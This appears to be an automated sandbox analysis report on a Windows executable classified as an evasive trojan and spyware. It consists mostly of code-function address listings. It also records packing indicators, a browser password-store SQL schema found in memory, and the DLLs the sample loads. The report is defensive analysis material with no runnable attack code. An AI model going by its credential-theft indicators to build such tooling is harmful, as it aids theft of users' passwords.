                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF06780_2_00CF0678
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1066D0_2_00D1066D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBE6170_2_00DBE617
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D886150_2_00D88615
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D5C60A0_2_00D5C60A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB46290_2_00CB4629
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7E7D60_2_00D7E7D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D4A7DD0_2_00D4A7DD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CCA7DE0_2_00CCA7DE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D567C70_2_00D567C7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D707C10_2_00D707C1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC87EB0_2_00CC87EB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CEE7E70_2_00CEE7E7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7A7E30_2_00D7A7E3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB67990_2_00CB6799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE879D0_2_00CE879D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D627830_2_00D62783
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDC7AF0_2_00CDC7AF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C667A50_2_00C667A5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D387B40_2_00D387B4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC67BB0_2_00DC67BB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC67A40_2_00CC67A4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CEA7BF0_2_00CEA7BF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC27BF0_2_00CC27BF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD87B80_2_00CD87B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFC7670_2_00CFC767
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C707170_2_00C70717
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CEC7160_2_00CEC716
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DDA7030_2_00DDA703
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D267320_2_00D26732
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D347360_2_00D34736
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C687310_2_00C68731
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D647210_2_00D64721
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D2A8DC0_2_00D2A8DC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D208C60_2_00D208C6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D4E8C30_2_00D4E8C3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8E8C20_2_00D8E8C2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D908F70_2_00D908F7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D408E50_2_00D408E5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD68F10_2_00CD68F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D4C8960_2_00D4C896
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA28910_2_00DA2891
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB488F0_2_00DB488F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D308860_2_00D30886
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3A8880_2_00D3A888
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3288E0_2_00D3288E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD68550_2_00DD6855
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D5A85E0_2_00D5A85E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC28530_2_00DC2853
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCE8420_2_00DCE842
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D608770_2_00D60877
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB68780_2_00DB6878
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D028100_2_00D02810
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0080C0_2_00D0080C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6E8350_2_00D6E835
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D9683C0_2_00D9683C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBE9C90_2_00CBE9C9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E5A9EB0_2_00E5A9EB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD29CD0_2_00DD29CD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8A9CD0_2_00D8A9CD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D9C9CE0_2_00D9C9CE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE49C90_2_00DE49C9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D469CD0_2_00D469CD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF29EF0_2_00CF29EF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D829F20_2_00D829F2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D409FA0_2_00D409FA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB89FB0_2_00CB89FB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBC9890_2_00CBC989
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D5C9960_2_00D5C996
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF49850_2_00CF4985
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D4299A0_2_00D4299A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE098F0_2_00DE098F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C589900_2_00C58990
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA89BA0_2_00DA89BA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D5A9BF0_2_00D5A9BF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D669B90_2_00D669B9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0C9440_2_00D0C944
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D869430_2_00D86943
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC69730_2_00EC6973
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB09760_2_00DB0976
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB497B0_2_00CB497B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D189640_2_00D18964
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C7297F0_2_00C7297F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CCE9730_2_00CCE973
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF690F0_2_00CF690F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE290B0_2_00CE290B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC89100_2_00DC8910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D789070_2_00D78907
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7C9070_2_00D7C907
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D989080_2_00D98908
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB291D0_2_00CB291D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DDC90B0_2_00DDC90B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D849300_2_00D84930
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D5692C0_2_00D5692C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD8ADD0_2_00DD8ADD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8CAC00_2_00C8CAC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D48AD90_2_00D48AD9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D64ADB0_2_00D64ADB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D5EAC10_2_00D5EAC1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBAADD0_2_00CBAADD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D08AF40_2_00D08AF4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D72AF20_2_00D72AF2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB0AFD0_2_00DB0AFD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D22AF50_2_00D22AF5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBEA9F0_2_00DBEA9F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB0A930_2_00CB0A93
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF0A930_2_00CF0A93
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DECAB50_2_00DECAB5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE2AB20_2_00DE2AB2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D54AA60_2_00D54AA6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C64A400_2_00C64A40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F00A770_2_00F00A77
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6CA5B0_2_00D6CA5B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C5CA540_2_00C5CA54
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D68A430_2_00D68A43
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF8A540_2_00CF8A54
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA6A440_2_00DA6A44
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8CA7D0_2_00D8CA7D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4A6A0_2_00CC4A6A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DACA730_2_00DACA73
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3CA070_2_00D3CA07
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D00A060_2_00D00A06
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D2CA380_2_00D2CA38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D12A3E0_2_00D12A3E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7EBD60_2_00D7EBD6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D80BD40_2_00D80BD4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D54BD80_2_00D54BD8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBCBC90_2_00DBCBC9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB4BFD0_2_00DB4BFD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D44BFE0_2_00D44BFE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CCCBFF0_2_00CCCBFF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D60BE00_2_00D60BE0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D9EBEE0_2_00D9EBEE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D96BE10_2_00D96BE1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CEEB870_2_00CEEB87
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA4B900_2_00DA4B90
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D36B9F0_2_00D36B9F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C54BA00_2_00C54BA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC0BA30_2_00CC0BA3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D88BA50_2_00D88BA5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D62B550_2_00D62B55
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD4B400_2_00CD4B40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C6CB5A0_2_00C6CB5A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D94B7B0_2_00D94B7B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDCB640_2_00CDCB64
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D26B600_2_00D26B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCAB1C0_2_00DCAB1C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DAEB180_2_00DAEB18
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC2B0C0_2_00DC2B0C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D28B0C0_2_00D28B0C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD0B300_2_00DD0B30
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFCB3F0_2_00CFCB3F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC4CDC0_2_00DC4CDC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D4ACD30_2_00D4ACD3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D4ECDF0_2_00D4ECDF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE2CD60_2_00CE2CD6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB2CE80_2_00CB2CE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8CCE00_2_00C8CCE0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBCCFE0_2_00CBCCFE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB8CF30_2_00CB8CF3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFCCF60_2_00CFCCF6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D32CE80_2_00D32CE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C72CF80_2_00C72CF8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA0CE50_2_00DA0CE5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE6C9D0_2_00DE6C9D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D98C830_2_00D98C83
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD0C900_2_00CD0C90
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D84CB80_2_00D84CB8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4CAF0_2_00CC4CAF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE6CA90_2_00CE6CA9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3ACA10_2_00D3ACA1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DAAC5E0_2_00DAAC5E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C84C4D0_2_00C84C4D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D90C4C0_2_00D90C4C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1AC7C0_2_00D1AC7C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD4C6C0_2_00DD4C6C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7AC600_2_00D7AC60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCEC160_2_00DCEC16
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C68C1E0_2_00C68C1E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1CC0A0_2_00D1CC0A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D94C3B0_2_00D94C3B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D86C3B0_2_00D86C3B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE0C230_2_00CE0C23
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D10C3E0_2_00D10C3E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D18C3E0_2_00D18C3E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC6C2C0_2_00DC6C2C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA2C2D0_2_00DA2C2D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3CDF20_2_00D3CDF2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3EDFB0_2_00D3EDFB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE6DF90_2_00CE6DF9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D92D8D0_2_00D92D8D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC0D880_2_00DC0D88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBEDA80_2_00CBEDA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBADAC0_2_00DBADAC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE2DB20_2_00CE2DB2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCCD5C0_2_00DCCD5C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CCAD480_2_00CCAD48
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D4CD450_2_00D4CD45
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8CD600_2_00C8CD60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C74D700_2_00C74D70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD2D660_2_00DD2D66
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DDCD1F0_2_00DDCD1F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8ED3A0_2_00D8ED3A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D2EEDE0_2_00D2EEDE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1AEEC0_2_00E1AEEC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D50EC80_2_00D50EC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC0EFC0_2_00DC0EFC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D2CEE20_2_00D2CEE2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBEEFF0_2_00CBEEFF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D5CEE00_2_00D5CEE0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC2EFA0_2_00CC2EFA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB0EF70_2_00CB0EF7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D88E880_2_00D88E88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C66E970_2_00C66E97
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D62E850_2_00D62E85
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C52EA00_2_00C52EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D00EBA0_2_00D00EBA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D40EBE0_2_00D40EBE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C76EBE0_2_00C76EBE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D30EAE0_2_00D30EAE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD0EA30_2_00DD0EA3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC0E4A0_2_00CC0E4A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF8E420_2_00CF8E42
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DDAE420_2_00DDAE42
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE8E660_2_00DE8E66
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D06E690_2_00D06E69
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DECE610_2_00DECE61
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC8E0F0_2_00CC8E0F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C6AE000_2_00C6AE00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8CE000_2_00C8CE00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB8E120_2_00DB8E12
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CECE1E0_2_00CECE1E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D20E010_2_00D20E01
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DDEE060_2_00DDEE06
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D52E2D0_2_00D52E2D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE0FCD0_2_00CE0FCD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFAFC20_2_00CFAFC2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CEAFC00_2_00CEAFC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D22FC20_2_00D22FC2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D80FC30_2_00D80FC3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE2FFE0_2_00DE2FFE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDCFEC0_2_00CDCFEC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCAFF80_2_00DCAFF8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF0FE40_2_00CF0FE4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D28FE30_2_00D28FE3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DAEFE80_2_00DAEFE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D66F9E0_2_00D66F9E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD6F930_2_00DD6F93
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA4F950_2_00DA4F95
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7EF890_2_00D7EF89
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C68FAD0_2_00C68FAD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D56FBA0_2_00D56FBA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7CFA60_2_00D7CFA6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF2FB80_2_00CF2FB8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D42F550_2_00D42F55
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D82F4D0_2_00D82F4D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D9EF410_2_00D9EF41
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C78F5D0_2_00C78F5D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D98F420_2_00D98F42
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD8F6C0_2_00CD8F6C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D2AF700_2_00D2AF70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEEF770_2_00DEEF77
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D32F790_2_00D32F79
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD4F090_2_00CD4F09
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3AF1B0_2_00D3AF1B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C64F080_2_00C64F08
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D46F1B0_2_00D46F1B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB2F310_2_00DB2F31
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D5EF3A0_2_00D5EF3A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6EF230_2_00D6EF23
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C6EF300_2_00C6EF30
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0EF260_2_00D0EF26
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CCEF360_2_00CCEF36
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB6F270_2_00DB6F27
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D590DC0_2_00D590DC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC30C20_2_00CC30C2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D5B0C20_2_00D5B0C2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC90FA0_2_00DC90FA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1F0D30_2_00E1F0D3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDF0FF0_2_00CDF0FF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6F0E00_2_00D6F0E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7B0EA0_2_00D7B0EA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C7D0850_2_00C7D085
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC70810_2_00DC7081
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D690B50_2_00D690B5
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00C64A30 appears 76 times
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00C58000 appears 55 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: ZLIB complexity 0.997627865484429
                Source: file.exeStatic PE information: Section: xyjapqsh ZLIB complexity 0.9942076156859846
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C80A6C CoCreateInstance,0_2_00C80A6C
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exe, 00000000.00000003.2085220224.0000000005F27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085449890.0000000005F0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: file.exeReversingLabs: Detection: 39%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
